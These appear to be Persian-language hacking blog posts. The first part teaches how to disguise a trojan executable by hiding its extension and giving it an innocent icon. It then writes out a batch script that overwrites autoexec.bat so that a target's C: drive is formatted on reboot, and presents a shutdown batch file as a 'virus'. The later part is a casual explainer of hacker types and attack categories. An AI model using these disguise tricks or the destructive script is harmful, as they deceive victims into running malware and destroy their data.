برای اینکار 2 راه موجود می باشد که من این 2 راه را برای شما میگم:
راه اول :
یک عدد فایل تروجان آماده کنید...
یه wordpad باز کنید ( می تونید رو دسکتاپ راست کلیک کنید به new برید و یه wordpad documernt باز کنید .
فایل تروجان رو کپی کنید و توی wordpad پیست کنید یا میتونید فایل رو با ماوس بکشید و تو صفحه word رها کنید .
حال همون فایلی رو که تو word گذاشتید را انتخاب کنید . یعنی روش تک کلیک کنید
بعد به edit برید و بعد به package و روی برگه edit package کلیک کنید حالا در پبجره باز شده به edit برید و copy package رو بزنید .
در آخر هم به یکی از فلودر ها یا درایوها برید راست کلیک کنید و paste رو بزنید .
به همین آسونی فایل تروجان exe یا هر اسم دیگری را میتونید بی نام و نشون کنید و علاوه بر اینکه ایکون فایل شبیه این بچه مثبتا میشه به همین راحتی هم پسوندشو لو نمی ده اصلا پسوندی در کار نیست .
راه دوم :
بر روی فایل تروجانی کا آماده کرده اید راست کلیک کنید وگزینه create shortcut را بر گزینید . حالا یه فایل از همون تروجان با اسم shortcut درست شده است حالا بر روی shortcut آن راست کلیک کنید و گزینه Properties را انتخاب کنید حال در پنجره باز شده جدید در بالای آن گزینه shortcut را انتخاب کنید و بعد بر روی گزینه change icon کیک کنید و در پنجره باز شده 100 ، 200 تا آیکون ظاهر میشود حالا هر کدوم را که دوست دارید انتخاب کنید و یا می تونید با زدن گزینه browse آیکنی که خود شما دارید را برگزینید
نظر یادت نره
برنامه NotePad رو باز کنین بعد فرمان زیر رو توش کپی و پیست کنید:
@echo off
call attrib -r -h c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo format /autotest c:/q>nul >>c:autoexec.bat
call attrib +r +h c:autoexec.bat >nul
exit
حالا فایل را با پسوند bat ذخیره کنین. مواظب یاشین که فایل رو اجرا نکنین چون کل اطلاعات درایو سی شما پاک می شه!
این فایل چه کار می کنه؟
اول کل اطلاعات موجود تو فایل autoexe.bat رو پاک می کنه بعد کد format /autotest c:/q رو توش می زاره وقتی هدف شما کامپیوتر رو ریست و دوباره راه اندازی کنه این کد اجرا می شه و درایو سی فرمت می شه!
------------------------
راستی اگه هم بخواین تعداد و نام پارتیشن مورد نظر رو با کمی تغییر توی فرمان ها می تونین تعیین کنین
نظر یادت نره
امروز میخوام آموزش ساختن یه ویروس رو بهتون یاد بدم.
این ویروس هم مثل بلستر پس ازاجرا با دادن مدت زمان 30 ثانیه کامپیوتر شما رو خاموش میکنه.
برای ساختن این ویروس ابتدا روی صفحه دسکتاب راست کلیک کنید.
سپس new و بعد از اون text document رو انتخاب کنید.
سپس وارد این فایل متنی شده و این عبارت رو تایپ کنید.
Shutdown –r
حالا از منوی فایل save as رو انتخاب کنید.
در قسمت file name اسم فایل رو مشخص کنید.
توجه کنید که این اسم حتما با پسوند bat باشه.مثل rockboys.bat
در قسمت encoding شما باید ANSI رو انتخاب کنید.
حالا save کنید.
شما میتونید این فایل رو روی خودتون اجرا کنید و نتیجه کار رو ببینید.
برای اینکه از خاموش شدن کامپیوترتون جلوگیری کنید کافیه در قسمت run عبارت زیر رو تایپ کنید.
Shutdown –a
انواع هکرها:
1- گروه نفوذگران کلاه سفید: (white hat hackers) : هر کسی که با دانش خود بتواند از سد موانع امنیتی یک شبک بگذرد و به داخل شبکه راه پیدا کند اما اقدام خرابکارانه ای انجام ندهد را یک هکر کلاه سفید می خوانند. خب حتما می گویید عجب ترجمه سختی ما که هیچ نفهمیدیم. عجله نکنید. اینم مثال راحتش. تصور کنید دانشجویی که در یک دانشگاه درس می خونه و می دونه تمامی لیست حضور و غیاب و نمرات دانشجوها در کامپیوتری در اتاق شبکه دانشگاه قرار داره. حالا این دانشجوی کنجکاو ما برای اینکه سر و گوشی آب داده باشه مدتها روی شبکه دانشگاه کار می کنه و از راه های مختلف( که خارج از بحث و حوصله این مقاله است و اگر بخوام راستش رو بگم میشه 100 ها کتاب راجعش نوشت) وارد اون شبکه میشه. یعنی به طور معمول هیچ دانشجویی حق نداره بتونه نمراتش رو ببینه ولی این پسر ناقلای ما یه جورایی وارد شبکه میشه و نمراتش رو می بینه و همچنین حضور و غیابش رو. خب این پسر ناقلا یک هکره. چون این پسر ناقلا فقط نمرات رو می بینه و دست کاری نمی کنه(لابد وجدانش اجازه نمی ده) یک هکر کلاه سفید میشه.
به عنوان مثالی دیگر هکرهای کلاه سفید متخصصین شبکه ای هستند که سوراخهای امنیتی شبکه را پیدا می کنند و به مسوولان گزارش می دهند. مثلا این دانشجوی ناقلا می تونه بره به مسوول شبکه بگه که چطوری وارد سیستمش شده( چون حتما یه ضعفی داشته دیگه) بعدش اونا هم بهش قاقالیلی میدن!
2-گروه نفوذگران کلاه سیاه (Black hat hackers) : به این گروه کراکر –Cracker- می گویند. این افراد آدمهایی هستند که با دانشی که دارند وارد کامپیوتر قربانی خود شده و به دستکاری اطلاعات و یا جاسوسی کردن و یا پخش کردن ویروس و غیرو می پردازند( در انتهای همین مقاله انواع راه های نفوذگری بحث شده). مثلا همون دانشجوی ناقلای مثال بالا اگر بره داخل شبکه و نمراتش رو عوض کنه و به خودش همش بیست بده و یا ایمیل دختر رییس دانشگاه رو از اون تو کش بره و نامه نگاری عاشقانه راه بندازه و یا اصلا روی تمام سیستمهای دانشگاه ویروس بندازه دیگه میشه یک کراکر. پس آقایون و خانومها دانش یک شخص می تونه در جهت مثبت به کار بره یا منفی. لب کلام اینکه اگر اون شخص آدم خوبی بود و تو شبکه دست کاری نکرد بهش میگن کلاه سفید اگر شرور بود و عشق خرابکاری بهش می گن کلاه سیاه. مثل یه آدمی تصور کنید که کشتی گیره. اگر هوای ضعیف ضعفا رو داشته باشه بهش میگن پهلوون اما اگر قلدر بازی واسه همه در بیاره مردم بهش می گن لات و چماق کش!
3-گروه نفوذگران کلاه خاکستری (gray hat hackers) : خب شاید سخت ترین کار توصیف حوزه این گروه از نفوذگرهاست. به این نفوذگرها بعضا whacker هم می گویند( البته زیاد مصطلح نیست فقط برای اطلاع بدانید). این گروه از نفوذگرها بنا به تعریفی حد وسط دو تعریف گذشته هستن. یعنی گاهی شیطنت می کنن و توی سیستم خرابکاری می کنن و گاهی خرابکاری نمی کنن! یعنی اینکه هم کلاه سفیدن هم کلاه سیاه واسه همین رنگشون رو قاطی کردن شده خاکستری! بنا به تعریف دیگه کلاه خاکستری ها شیطونی هاشون هم عامه پسنده یعنی اگر بخوان خرابکاری کنن در جهت اطلاع عموم انجام میدن و به قول معروف فی سبیل الله و برای مردم. مثلا اون دانشجوئه مثال بالا اگه بیاد یه نسخه از لیست حضور و غیاب رو به ایمیل تمام دانشجویان دیگه بزنه و بگه برید حالا حالش رو ببرید و ببینید هرکی چقدر غیبت داره و نمره تحقیقش چند شده.
4- گروه نفوذگران کلاه صورتی ( pink hat hackers): خب این دسته بندی به ندرت دیده شده و اکثر مواقع کلاه صورتی ها رو جزیی از کلاه سیاه ها می دونند. به زبان شیرین فارسی اینها همون جوجه هکرها هستند! این افراد آدمهای کم سوادی هستند که فقط با چند نرم افزار به خرابکاری و آزار و اذیت بقیه اقدام می کنن. مثلا شماها رو توی مسنحر یاهو بوت می کنن و یا توی چت رومها خرابکاری می کنن و یا با نرم افزارهای آماده ایی مثل ساب سون و غیرو اقدام به هک کردن بقیه می کنن و از این قبیل. بنابراین به کلاه صورتی ها می گیم جوجه هکر!
انواع حمله هکرها:
- استراق سمع (interception) : در این روش نفوذگر موفق شده که در حین تبادل اطلاعات گوش کند. وی مخفیانه این اطلاعات را مورد نظر داشته و اطلاعات مورد نیاز را برای خودش نسخه برداری می کند. تکنیک ها و روش های بسیاری را هکرها در استراق سمع به کار می برند که یکی از آنها همان sniff بود که در مقاله چند روز قبل کوتاه به آن اشاره کردم. بگذارید مثالی بزنم تا 2 زاریتان کاملا بیفتد. شما در حال مخ زدن در روی اینترنت هستید و شبهای متمادی وقت گذاشتید مخ این دختره رو بزنید و شمارش رو بگیرید. در حال چت کردن هستید که بالاخره عروس خانوم شماره رو به شما میده و شما خوشحال که فردا حتما بهش زنگ می زنید. اما شمای بدبخت نمی دونید که یه هکری ناقلایی کامپیوتر شما رو زیر نظر داره و کلیه چت های شما و اون خانوم رو داره می بینه. اون هکره داره استراق سمع می کنه. حرفاتون براش دلچسب نیست ولی به محض دیدن اون شماره تلفن براش جالب توجه میشه! اینکه شماره تلفن رو یادداشت می کنه و فردا زنگ می زنه به دختره و همون صبحش قرار می گذاره و عشق و حالی که نگو. سر بدبخت شما هم کلاه میره. این جوریاس دیگه. باید زندگی کرد!!!
- دستکاری اطلاعات (modification ): نفوذگر عزیزمون موفق به تغییر اطلاعات میشه. در اینجا بدون اطلاع از قربانی بدبخت, هکر ما اطلاعات رو تغییر میده. مثلا یکی بیاد و بره داخل لیست نمرات یک دانشگاه و نمراتش رو همچین یک حال اساسی بهشون بده و معدلش از 13 بشه 18!
- افزودن اطلاعات و جعل ( fabrication ): در این روش نفوذگر اطلاعات رو به سرقت نمی بره و یا جایگرین نمی کنه بلکه به اطلاعات فقط اطلاعات دیگری رو اضافه می کنه. مثلا فرض کنید مدیر شرکتی نامه ای می زنه به مسوول خرید و لیست خریدی برای شرکت میده. حال شما که هکر بسیار زرنگی هستید این نامه رو جعل کرده و یه سری چیزها بهش اضافه می کنید مثلا می نویسید که خرید یک میز جدید برای آقایی که خودتون باشید! و بعد نامه رو می فرستید برای مامور خرید. مامور خرید بی نوا هم میره لیست رو تهیه می کنه. به واقع شما در اینجا اطلاعات حاوی اون نامه رو همون طور که هست می گذارید باشه ولی بهش مطالب جدید هم اضافه می کنید. هرچند می شه این اقدام رو در زیر شاخه modification آورد اما میگم شما زیاد درگیر گروه بندی نشید بلکه مفهوم رو متوجه بشید که به واقع هدف اصلی این مقاله همینه.
- حمله از نوع وقفه ( interruption): در این نوع حمله هکر باعث اختلال در شبکه و تبادل اطلاعات میشه. تکنیک های بسیاری وجود داره برای هکرها اما 2 مثال بسیار مشهود که نتیجه اش برای یک وبگرد به وضوح مشخصه و در نتیجه همین حملات صورت می گیره یکی در چت رومهاست که گاهی می بیند کسی کامپیوتر سرور چت رو وقفه می ندازه و دیگر شما قادر به چت در آن چت روم نیستید و یا اینکه حتما شنیده اید وقتی هکری به یک سایت حمله کرده و باعث کندی آن سرور شده و این باعث می شود که اگر سایت در عرض 5 ثانیه می بایست در مرورگر شما ظاهر شود یا اصلا قابل بارگزاری نیست (سایت به قول معروف لود نمی شود) و یا اینکه بعد از مثلا 1 دقیقه ظاهر می شود. اینگونه حملات بلای جان کسانی است که مسوول یک سایت و یا شبکه هستند چرا که کندی شبکه همانا و سر و صدای مدیر در آمدن همانا.
نظر یادت نره